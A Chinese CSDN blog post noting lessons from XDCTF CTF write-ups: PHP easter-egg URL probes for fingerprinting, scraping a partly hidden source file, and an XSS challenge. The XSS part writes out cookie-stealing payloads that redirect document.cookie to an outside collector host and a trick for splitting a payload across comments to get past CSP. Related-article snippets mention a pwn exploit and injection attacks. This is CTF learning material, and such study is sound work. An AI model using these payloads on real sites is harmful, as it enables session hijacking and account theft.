About Xdctf【1】

最新推荐文章于 2024-04-08 09:41:10 发布
最新推荐文章于 2024-04-08 09:41:10 发布
阅读量164 收藏
点赞数
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013259218/article/details/40082747
版权

由于十一假期出去玩,所以没能参加观摩ctf比赛,经过这几天对writeup的学习,学到以下各个方面的知识:

1.web20:php彩蛋 

                 可以通过在网站域名后面加“彩蛋”来判断一个网站是否是由php编写的。是否显示php彩蛋是通过php.ini中expose_php来控制的,设置为Off则不会显示了。

                  只要在URL后面加?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000(PHP信息列表)

                                       ?=PHPE9568F34-D428-11d2-A769-00AA001ACF42(PHPLOGO)

                                       ?=PHPE9568F35-D428-11d2-A769-00AA001ACF42(Zend LOGO)

                                   ?=PHPE9568F36-D428-11d2-A769-00AA001ACF42(PHP LOGO 蓝色大象)

                 学习目标:进一步了解php作用,使用方法

2.web200: 在地址后面加上help得到链接由于其他原因,我的网页显示了一堆乱码,按照writeup的说法应该得到下一条线索

                  会得到python文件,但每次访问只显示两行。于是写个简单的爬虫或用burpsuite将所有行读取出来,得到newapp.py

                  学习目标:学习些简单的爬虫,了解其原理

3.web250: XSS题。直接利用xss平台来加载远程js,不能执行代码(csp里限制了加载外部资源),也不能通过常规的new

                 Image().src

                 来传递cookie。需要用location.href=”http://xss.com/?cookie=”+escape(document.cookie)或者

                   vara=document.createElement("a");a.href='http://xss.com/?cookie='+escape(document.cookie);a.click();

                 让页面跳转到xss平台并将cookie带在参数中即可

                 另一个思路:注册的时候的用户名写成javascript代码,如“*/alert(1);/*”,然后发表两条留言,[/script]和[script],

                                       这样就能拼接而成一个完整的payload

                 学习目标:学习XSS题型,更深入的了解js在其中起到的作用

 

 

cat_in_boots
关注
专栏目录
逆向题目XDCTF5
03-10
2016中国-西安电子科技大学XDCTF网络安全技能大赛之伏羲剑
xdctf-pwn200
Vccxx的博客
04-08 1363
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
2017 XDCTF Upload
4ct10n
10-06 1521
比赛早就结束了,有个web题目一直没想到怎么写直到官方发题解才知道,原来还有这一个套路(其实是一个知识点的),好久没有写博客了要长草了,写个博客记录一下
[XDCTF 2015]filemanager
rev1ve的博客
01-02 633
update命令涉及到参数newname以及从数据库中查找参数oldname值,而后面进行rename()的时候是文件名(不包括拓展名),并且后面拼接路径是从数据库中查找拓展名,那么是不是可以文件名为1.php,然后拓展名为空即可实现getshell。至于为什么选择在oldname注入,是因为文件上传的时候虽然做了转义但是文件名并不会发生改变,然后在rename的时候oldname是从数据库中找到,而我们在newname注入的话,会发生转义导致文件路径包含\。是从数据库中得到的,也就是说文件名。
XDCTF2015_re100
weixin_30604651的博客
10-28 130
去年做的一道 CTF,清理文档 0x01 The .init and .fini Sections 参考下面链接:http://www.ru.j-npcs.org/usoft/WWW/www_debian.org/Documentation/elf/node3.html 简单说一下,即.init中的指令,在main()函数之前执行,.fini中的指令,在main()函数返回后执行; 一段代...
XDCTF2015:关于XDCTF 2015的文章
05-04
XDCTF2015 writeup about XDCTF 2015 gitcommit.py 我自己写的python版git获取源码的工具 GitRefs.sh web2-100获取源码.sh版 xdseccms.py 后台time-based盲注
ntp校时软件windows版本-abouttime
03-31
ntp校时软件windows版本,AboutTime 是一款比较古老的软件了,尽管如此,它以其强大的功能和精巧高效,仍被很多人喜爱和使用。它既可作为校时客户端为本机校时,也可在局域网中作为校时服务器运行。常用于windows...
about.html
04-10
about.html
APAKAH-BITCOIN-ITU.zip_About Language
09-24
introduce about bitcon - in indonesian language
XDCTF 部分Writeup
Simp1er的csdn博客
10-03 586
XDCTF Writeup Crypto Misc Android
XDCTF PWN300&400 Writeup
这里没人
05-14 743
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
探索 XDCTF2015:一个黑客马拉松式的网络安全学习平台
gitblog_00088的博客
04-08 313
探索 XDCTF2015:一个黑客马拉松式的网络安全学习平台 项目地址:https://gitcode.com/phith0n/XDCTF2015 项目简介 XDCTF2015 是一个基于 GitCode 平台的开源项目,由 phith0n 创建,旨在为网络安全爱好者提供一种实战型的学习体验。它是一个在线的安全挑战赛框架,模拟了典型的网络安全竞赛(Capture The Flag, CTF)环境,...
攻防世界 XDCTF-2015WP(萌新版)
TedLau的博客
04-03 276
from pwn import * r=process('./pwn200') elf=ELF('pwn200') write_plt=elf.plt['write'] read_plt=elf.plt['read'] start_addr=0x80483d0 func_addr=0x08048484 ppp_addr=0x0804856c def leak(addr): ...
XDCTF成长记录
weixin_33762130的博客
10-20 114
9.30----国庆第一天前记:这该是一个值得怀念的假期,又一次体验悲喜交加的感觉。在最初忘了自己的初衷,然后又在队友的帮助下,逐渐的回复了自己的信心,一步一步从零到一个小菜鸟。现在是时候写下那时自己的思路以及真实思路的差距,好让在其中学习各种奇淫技巧。(1)第一道题是提示是“help youself”,那时呈现在眼前的是那时海里呈现的思路只有两个,第一查看网页的源码,在源码...
BUUCTF:[XDCTF 2015]filemanager
末初的CSDN博客
07-26 1612
题目地址:https://buuoj.cn/challenges#[XDCTF%202015]filemanager 首先网站目录下/www.tar.gz是隐藏源码文件 xdctf.sql:数据库表结构 common.inc.php对所有传入的参数进行了addslashes()转义 upload.php上传的文件名经过: $file[‘name’] -> pathinfo() –> $path_parts["filename"] -> addslashes() -> inser
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2226
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
CTF--2016XDCTF全国网络安全大赛之reverse5
关注互联网安全的小虾米一枚
03-10 6146
2016中国-XDCTF全国网络安全大赛 第七届全国网络安全大赛(XDCTF2016)暨第五届陕西省网络安全技能大赛
BUUCTF:[XDCTF 2015]filemanager
Keepb1ue的博客
08-03 3378
靶场地址: https://buuoj.cn/challenges#[XDCTF%202015]filemanager 题目首页给出了源码: https://github.com/CTFTraining/xdctf_2015_filemanager 而在这道题中也存在源码泄露: 这道题主要还是考察代码审计和二次注入: 网站结构源码解析: 数据库结构: xdctf.sql SET NAMES utf8; SET FOREIGN_KEY_CHECKS = 0; DROP DATABASE IF EXISTS
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
最新发布
10-12
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
VsFlexgird 弹出about界面
09-19
1. **添加资源**:在项目中包含一个AboutBox类,这个类通常包含一个Form控件,并放置有关软件的信息。 ```csharp public partial class AboutForm : Form { // ... 控件设置和版信息等内容 ... } ``` 2. **关联...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值